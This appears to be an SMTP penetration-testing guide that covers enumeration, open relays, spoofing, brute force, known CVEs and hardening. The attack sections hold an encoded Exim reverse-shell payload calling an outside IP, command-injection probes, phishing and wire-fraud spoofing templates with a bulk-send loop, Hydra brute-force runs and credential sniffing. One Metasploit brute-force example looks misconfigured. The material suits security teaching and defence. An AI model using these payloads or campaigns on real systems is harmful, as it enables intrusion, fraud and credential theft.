SMTP Service Attacks and Exploitation
SMTP exploitation guide covering user enumeration, open relay testing, email spoofing, brute-force authentication, and NTLM information disclosure.
Introduction
The Simple Mail Transfer Protocol (SMTP) is the standard protocol for sending email messages between mail servers across the Internet. Operating primarily on TCP ports 25, 465 (SMTP over SSL), and 587 (submission), SMTP has been fundamental to email communication since 1982.
Despite decades of refinement, SMTP implementations remain vulnerable to various security issues:
- User enumeration: Discovery of valid email addresses and usernames
- Open relay misconfiguration: Abuse for spam distribution
- Authentication weaknesses: Plain-text credentials, weak passwords
- Email spoofing: Forged sender addresses and phishing
- Command injection: Exploitation of poorly validated input
- Information disclosure: Banner and error message leakage
Why SMTP Remains a Security Concern
SMTP's security challenges stem from both design limitations and implementation issues:
- Legacy protocol: Designed before modern security considerations
- Plain-text by default: Credentials transmitted without encryption
- Trust-based architecture: Originally assumed trusted network
- Complex implementations: Multiple RFCs with inconsistent adherence
- Universal deployment: Every organization runs mail servers
- Social engineering vector: Email-based attacks target human vulnerabilities
- Spam and phishing: SMTP abuse for malicious campaigns
Successful SMTP exploitation can lead to:
- User account compromise: Password discovery or brute-force
- Internal network mapping: Valid username enumeration
- Phishing infrastructure: Open relay abuse
- Email interception: Man-in-the-middle attacks on unencrypted connections
- Privilege escalation: Vulnerable email clients or server components
Technical Background
SMTP Protocol Overview
SMTP operates on a simple command-response model:
Connection Flow:
- Client establishes TCP connection to server port 25/587/465
- Server sends greeting banner (220 code)
- Client sends HELO/EHLO command
- Server responds with capabilities
- Client authenticates (if required)
- Client sends mail transaction (MAIL FROM, RCPT TO, DATA)
- Server accepts or rejects message
- Connection closes with QUIT command
SMTP Ports and Their Purposes
| Port | Purpose | Encryption | Common Use |
|---|---|---|---|
| 25 | SMTP | Plain-text (optional STARTTLS) | Server-to-server communication |
| 465 | SMTPS | Implicit SSL/TLS | Legacy secure submission (deprecated) |
| 587 | Submission | STARTTLS required | Client-to-server mail submission |
| 2525 | Alternative | STARTTLS available | Alternative submission port |
Essential SMTP Commands
| Command | Purpose | Example |
|---|---|---|
| HELO | Identify client (simple) | HELO mail.example.com |
| EHLO | Identify client (extended) | EHLO mail.example.com |
| MAIL FROM | Specify sender | MAIL FROM:<[email protected]> |
| RCPT TO | Specify recipient | RCPT TO:<[email protected]> |
| DATA | Begin message content | DATA |
| VRFY | Verify email address | VRFY admin |
| EXPN | Expand mailing list | EXPN staff |
| RSET | Reset transaction | RSET |
| QUIT | Close connection | QUIT |
| STARTTLS | Upgrade to TLS | STARTTLS |
| AUTH | Authenticate client | AUTH LOGIN |
SMTP Response Codes
| Code | Meaning | Explanation |
|---|---|---|
| 220 | Service ready | Server greeting |
| 221 | Service closing | Goodbye message |
| 250 | Requested action completed | Success |
| 354 | Start mail input | Ready for DATA |
| 421 | Service not available | Server closing connection |
| 450 | Mailbox unavailable | Temporary failure |
| 550 | Mailbox unavailable | Permanent failure |
| 551 | User not local | Relaying denied |
| 552 | Exceeded storage | Mailbox full |
| 553 | Mailbox name invalid | Bad recipient |
Enumeration
Banner Grabbing and Service Detection
Basic Banner Grab
```
# Using Netcat
nc 10.10.11.45 25
# Using Telnet
telnet 10.10.11.45 25
# Using Nmap
nmap -p 25,465,587 -sV 10.10.11.45
# Grab and disconnect
echo "QUIT" | nc 10.10.11.45 25
```
Example Banners:
```
220 mail.example.com ESMTP Postfix
220 mail.example.com Microsoft ESMTP MAIL Service ready
220 mail.example.com ESMTP Sendmail 8.15.2
220 mail.example.com ESMTP Exim 4.94
```
Extended SMTP Enumeration
```
# Enumerate SMTP capabilities
nc 10.10.11.45 25
EHLO test.com
QUIT
# Automated with Nmap
nmap -p 25 --script smtp-commands 10.10.11.45
nmap -p 25,465,587 --script smtp-enum-users 10.10.11.45
```
EHLO Response Example:
```
250-mail.example.com Hello test.com
250-SIZE 52428800
250-PIPELINING
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
```
Nmap SMTP Script Scan
```
# Comprehensive SMTP scan
nmap -p 25,465,587 -sV --script=smtp-* 10.10.11.45
# Specific useful scripts
nmap -p 25 --script smtp-commands 10.10.11.45
nmap -p 25 --script smtp-open-relay 10.10.11.45
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} 10.10.11.45
nmap -p 25 --script smtp-ntlm-info 10.10.11.45
```
Useful NSE Scripts:
- smtp-commands: List available SMTP commands
- smtp-enum-users: Enumerate users via VRFY, EXPN, RCPT
- smtp-open-relay: Test for open relay
- smtp-ntlm-info: Extract Windows domain information
- smtp-brute: Brute-force SMTP AUTH
- smtp-vuln-*: Check for known vulnerabilities
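As an added check that is not part of the original guide, the following Python parses an EHLO reply like the example response above and reports the settings the hardening section later turns off: AUTH offered before STARTTLS, STARTTLS missing, and VRFY/EXPN advertised. The reply it parses is constructed, modelled on the example response with a 250-VRFY line added as Postfix advertises it.

```python
import re

# Constructed EHLO reply modelled on the example response in the text.
SAMPLE_EHLO_REPLY = """\
250-mail.example.com Hello test.com
250-SIZE 52428800
250-PIPELINING
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-VRFY
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
"""

EHLO_LINE = re.compile(r"^250[- ](\S+)(?:\s+(.*))?$")


def parse_ehlo(reply):
    """Map each advertised keyword to its parameters, e.g. {'AUTH': ['PLAIN', 'LOGIN']}.

    The first line is the server greeting, not a capability, so it is skipped.
    A line that is not a 250 continuation means this is not an EHLO reply.
    """
    caps = {}
    for line in reply.splitlines()[1:]:
        m = EHLO_LINE.match(line)
        if not m:
            raise ValueError("not an EHLO reply line: %r" % line)
        caps[m.group(1).upper()] = (m.group(2) or "").split()
    return caps


def audit_ehlo(reply, tls_active=False):
    """Return the findings a defender would act on.

    tls_active=False means the reply was read on the cleartext session
    (before STARTTLS), so any AUTH offered there would carry credentials
    unencrypted; Postfix prevents this with smtpd_tls_auth_only = yes.
    """
    caps = parse_ehlo(reply)
    findings = []
    if "AUTH" in caps and not tls_active:
        findings.append("AUTH offered on cleartext session: " + " ".join(caps["AUTH"]))
    if "STARTTLS" not in caps and not tls_active:
        findings.append("STARTTLS not advertised")
    for cmd in ("VRFY", "EXPN"):
        if cmd in caps:
            findings.append(cmd + " enabled (user enumeration possible)")
    return findings
```

Run audit_ehlo twice on a real server, once on the plaintext reply and once after STARTTLS, to see which capabilities are only offered inside TLS.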
User Enumeration Techniques
VRFY Command
The VRFY command verifies if a mailbox exists:
```
# Manual enumeration
nc 10.10.11.45 25
VRFY root
VRFY admin
VRFY nonexistent
# Example responses
250 2.1.5 [email protected]
550 5.1.1 User unknown
```
EXPN Command
The EXPN command expands mailing lists:
```
nc 10.10.11.45 25
EXPN staff
EXPN administrators
# Example response
250 2.1.5 <[email protected]>
250 2.1.5 <[email protected]>
250 2.1.5 <[email protected]>
```
RCPT TO Command
Test recipient validity:
```
nc 10.10.11.45 25
HELO test.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
# Valid user: 250 2.1.5 OK
# Invalid user: 550 5.1.1 User unknown
```
Automated User Enumeration
```
# Using smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > run
# Using Nmap
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT},smtp-enum-users.domain=example.com 10.10.11.45
```
NTLM Information Disclosure
Extract Windows domain information from SMTP servers supporting NTLM authentication:
```
# Using Nmap
nmap -p 25,465,587 --script smtp-ntlm-info 10.10.11.45
# Manual extraction
nc 10.10.11.45 25
EHLO test
AUTH NTLM
334
TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# Server responds with NTLM challenge containing domain info
```
Information Leaked:
- NetBIOS domain name
- NetBIOS computer name
- DNS domain name
- DNS computer name
- DNS tree name
- Timestamp
Exploitation Techniques
Open Relay Testing
An open relay accepts mail from any sender to any destination, which makes it useful to attackers for spam and phishing.
Manual Open Relay Test
```
nc 10.10.11.45 25
HELO test.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Test Email
From: [email protected]
To: [email protected]
This is a test email.
.
QUIT
```
Open Relay Indicators:
- 250 OK response to an external RCPT TO
- Email successfully relayed to an external domain
Automated Open Relay Testing
```
# Using Nmap
nmap -p 25 --script smtp-open-relay 10.10.11.45
# Using swaks
swaks --to [email protected] --from [email protected] --server 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_relay
msf6 auxiliary(scanner/smtp/smtp_relay) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_relay) > run
```
Abuse Open Relay
```
# Send phishing email
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Urgent: Update Your Credentials" \
--body "Click here: http://evil.com/phish"
# Bulk email campaign
for email in $(cat targets.txt); do
swaks --to $email --from [email protected] --server 10.10.11.45 --body "Phishing message"
sleep 5
done
```
Legal Warning
Sending unsolicited email or phishing messages through open relays is illegal. This information is provided for authorized penetration testing and defensive security assessment only.
Email Spoofing
SMTP's lack of sender verification allows email spoofing:
```
# Basic spoofing with Netcat
nc 10.10.11.45 25
HELO mail.example.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
From: CEO <[email protected]>
To: Employee <[email protected]>
Subject: Urgent Payment Request
Date: Thu, 30 Oct 2025 10:00:00 -0000
Please wire $50,000 to account...
.
QUIT
# Using swaks
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Wire Transfer Request" \
--body "Transfer funds immediately..."
# Using sendemail
sendemail -f [email protected] \
-t [email protected] \
-u "Urgent Request" \
-m "Transfer funds..." \
-s 10.10.11.45
```
SPF/DKIM/DMARC Bypass:
- Spoof internal domain if no SPF record
- Use similar-looking domains (typosquatting)
- Exploit subdomain takeovers with valid SPF
- Leverage trusted third-party services
Authentication Brute-Force
When SMTP AUTH is enabled, test weak credentials:
```
# Using Hydra
hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt smtp://10.10.11.45
# With specific port
hydra -l admin -P passwords.txt -s 587 smtp://10.10.11.45
# Multiple users
hydra -L users.txt -P passwords.txt smtp://10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > run
```
Command Injection
Test for command injection in poorly sanitized SMTP implementations:
```
# Test in MAIL FROM
MAIL FROM:<[email protected]`whoami`>
# Test in RCPT TO
RCPT TO:<[email protected]|id>
# Test in message headers
DATA
Subject: Test`id`
From: [email protected]
To: [email protected]
.
```
Known SMTP Vulnerabilities
Sendmail Debug Mode (CVE-1999-0095)
```
# Using Metasploit
msfconsole
msf6 > use exploit/unix/smtp/sendmail_debug
msf6 exploit(unix/smtp/sendmail_debug) > set RHOST 10.10.11.45
msf6 exploit(unix/smtp/sendmail_debug) > exploit
```
Exim SMTP RCE (CVE-2019-10149)
```
# Manual exploit
nc 10.10.11.45 25
HELO test
MAIL FROM:<${run{\x2fbin\x2fsh\t-c\t\x22bash\x20-i\x20>%26\x20\x2fdev\x2ftcp\x2f10.10.14.5\x2f4444\x200>%261\x22}}@test.com>
RCPT TO:<root@localhost>
DATA
.
QUIT
```
Microsoft Exchange SSRF (CVE-2021-26855 - ProxyLogon)
Part of the ProxyLogon vulnerability chain exploiting Microsoft Exchange:
```
# Using Metasploit
msf6 > use exploit/windows/http/exchange_proxylogon_rce
msf6 exploit(windows/http/exchange_proxylogon_rce) > set RHOSTS 10.10.11.45
msf6 exploit(windows/http/exchange_proxylogon_rce) > set EMAIL [email protected]
msf6 exploit(windows/http/exchange_proxylogon_rce) > exploit
```
Post-Exploitation
Email Phishing Infrastructure
Use a compromised SMTP server for phishing campaigns:
```
# Create credential harvester
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
./evilginx
# Configure phishing lure
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Security Update Required" \
--body "Update your credentials: https://phishing-site.com"
```
Internal Network Mapping
Use user enumeration for internal reconnaissance:
```
# Enumerate all users
for user in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do
echo "VRFY $user" | nc 10.10.11.45 25 | grep "^250"
done
# Discover naming convention
smtp-user-enum -M VRFY -u admin,administrator,root,sysadmin -t 10.10.11.45
# Build user list for password spraying
./validate_users.sh > valid_users.txt
```
Email Interception
Monitor SMTP traffic for sensitive information:
```
# Tcpdump on SMTP port
tcpdump -i eth0 -A -s 0 'tcp port 25'
# Wireshark display filter
tcp.port == 25 && smtp
# Extract credentials (match packets whose payload starts with "AUTH")
tcpdump -i eth0 -A -s 0 'tcp port 25 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x41555448)'
```
Detection and Defense
Monitoring SMTP Activity
Log Analysis:
```
# Postfix logs
tail -f /var/log/mail.log
grep "authentication failed" /var/log/mail.log
# Sendmail logs
tail -f /var/log/maillog
# Failed authentication attempts
grep "SASL authentication failed" /var/log/mail.log | awk '{print $9}' | sort | uniq -c | sort -n
# Unusual recipient patterns (potential spam)
grep "RCPT TO" /var/log/mail.log | awk '{print $7}' | sort | uniq -c | sort -n
# Monitor for relaying
grep "relay denied" /var/log/mail.log
```
Hardening SMTP Configuration
Disable User Enumeration
Postfix (/etc/postfix/main.cf):
```
disable_vrfy_command = yes
smtpd_banner = $myhostname ESMTP
```
Sendmail (/etc/mail/sendmail.mc):
```
define(`confPRIVACY_FLAGS', `goaway,noexpn,novrfy')dnl
```
Exim (/etc/exim4/exim4.conf.template):
```
smtp_verify = false
smtp_expn_hosts = localhost
```
Configure Authentication
Postfix SMTP AUTH:
```
smtpd_sasl_auth_enable = yes
smtpd_sasl_type = dovecot
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_local_domain = $myhostname
```
Prevent Open Relay
Postfix:
```
smtpd_recipient_restrictions =
permit_mynetworks,
permit_sasl_authenticated,
reject_unauth_destination
mynetworks = 127.0.0.0/8, 10.10.10.0/24
```
Sendmail:
```
FEATURE(`access_db')dnl
```
Then configure /etc/mail/access:
```
localhost.localdomain RELAY
localhost RELAY
10.10.10 RELAY
```
Enable TLS/SSL
Postfix:
```
smtpd_tls_cert_file = /etc/ssl/certs/mail.crt
smtpd_tls_key_file = /etc/ssl/private/mail.key
smtpd_tls_security_level = may
smtpd_tls_protocols = !SSLv2, !SSLv3, !TLSv1, !TLSv1.1
smtp_tls_mandatory_ciphers = high
```
Force STARTTLS for submission (/etc/postfix/master.cf):
```
submission inet n - y - - smtpd
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
```
Rate Limiting
Postfix:
```
smtpd_client_connection_rate_limit = 10
smtpd_client_message_rate_limit = 20
smtpd_client_recipient_rate_limit = 50
anvil_rate_time_unit = 60s
```
Implement SPF, DKIM, DMARC
SPF Record (DNS TXT):
```
v=spf1 mx ip4:10.10.11.45 -all
```
DMARC Record (DNS TXT for _dmarc subdomain):
```
v=DMARC1; p=reject; rua=mailto:[email protected]; ruf=mailto:[email protected]; fo=1
```
DKIM Configuration:
```
# Generate DKIM keys
opendkim-genkey -t -s mail -d example.com
# Add to DNS
# mail._domainkey.example.com TXT "v=DKIM1; k=rsa; p=MIGfMA0GCS..."
```
Intrusion Detection
```
# Configure fail2ban for SMTP
# /etc/fail2ban/jail.local
[postfix-sasl]
enabled = true
port = smtp,465,587
filter = postfix-sasl
logpath = /var/log/mail.log
maxretry = 3
bantime = 3600
# Create filter /etc/fail2ban/filter.d/postfix-sasl.conf
[Definition]
failregex = : warning: [-._\w]+\[<HOST>\]: SASL (?:LOGIN|PLAIN|(?:CRAM|DIGEST)-MD5) authentication failed
# Restart fail2ban
systemctl restart fail2ban
```
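The grep pipelines in the Log Analysis section and the fail2ban failregex above both key on the same Postfix log patterns. As an added example (not part of the original guide), the following Python applies that logic offline: it counts SASL failures, unknown-recipient rejects (RCPT TO enumeration) and relay refusals per client IP and flags any source that reaches the jail's maxretry threshold. The log lines are constructed in Postfix's format, not taken from a real server.

```python
import re
from collections import Counter

# Constructed log lines in Postfix's format (not from a real server): a
# password-guessing client, a recipient-probing client and one normal login.
SAMPLE_LOG = """\
Oct 30 10:00:01 mail postfix/smtpd[1234]: warning: unknown[10.10.14.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct 30 10:00:02 mail postfix/smtpd[1234]: warning: unknown[10.10.14.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct 30 10:00:03 mail postfix/smtpd[1234]: warning: unknown[10.10.14.5]: SASL PLAIN authentication failed: UGFzc3dvcmQ6
Oct 30 10:00:04 mail postfix/smtpd[1234]: warning: unknown[10.10.14.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct 30 10:00:05 mail postfix/smtpd[1240]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <zzz@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@test.com> to=<zzz@example.com> proto=ESMTP helo=<test.com>
Oct 30 10:00:06 mail postfix/smtpd[1240]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <yyy@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@test.com> to=<yyy@example.com> proto=ESMTP helo=<test.com>
Oct 30 10:00:07 mail postfix/smtpd[1250]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 554 5.7.1 <x@other.org>: Relay access denied; from=<a@test.com> to=<x@other.org> proto=ESMTP helo=<test.com>
Oct 30 10:00:08 mail postfix/smtpd[1260]: 1A2B3C: client=unknown[10.10.10.7], sasl_method=PLAIN, sasl_username=alice
"""

# Same pattern as the fail2ban postfix-sasl failregex, with <HOST> as a named group.
SASL_FAIL = re.compile(
    r": warning: [-._\w]+\[(?P<host>[^\]]+)\]: SASL "
    r"(?:LOGIN|PLAIN|(?:CRAM|DIGEST)-MD5) authentication failed")
RCPT_REJECT = re.compile(r"NOQUEUE: reject: RCPT from [-._\w]+\[(?P<host>[^\]]+)\]: \d{3} ")


def triage(log_text, maxretry=3):
    """Count SASL failures, unknown-recipient rejects and relay refusals per IP.

    Returns (sasl, rcpt, relay, flagged); flagged holds every IP whose count
    in any category reached maxretry, the same threshold the jail bans at.
    """
    sasl, rcpt, relay = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = SASL_FAIL.search(line)
        if m:
            sasl[m.group("host")] += 1
            continue
        m = RCPT_REJECT.search(line)
        if m:
            # A refused relay is a relay probe; other RCPT rejects are recipient probing.
            bucket = relay if "Relay access denied" in line else rcpt
            bucket[m.group("host")] += 1
    flagged = set()
    for counter in (sasl, rcpt, relay):
        flagged |= {ip for ip, n in counter.items() if n >= maxretry}
    return sasl, rcpt, relay, flagged
```

Feed it the real /var/log/mail.log to see which sources the fail2ban jail would have banned and which recipient-probing sources it would miss, since the postfix-sasl filter only matches SASL failures.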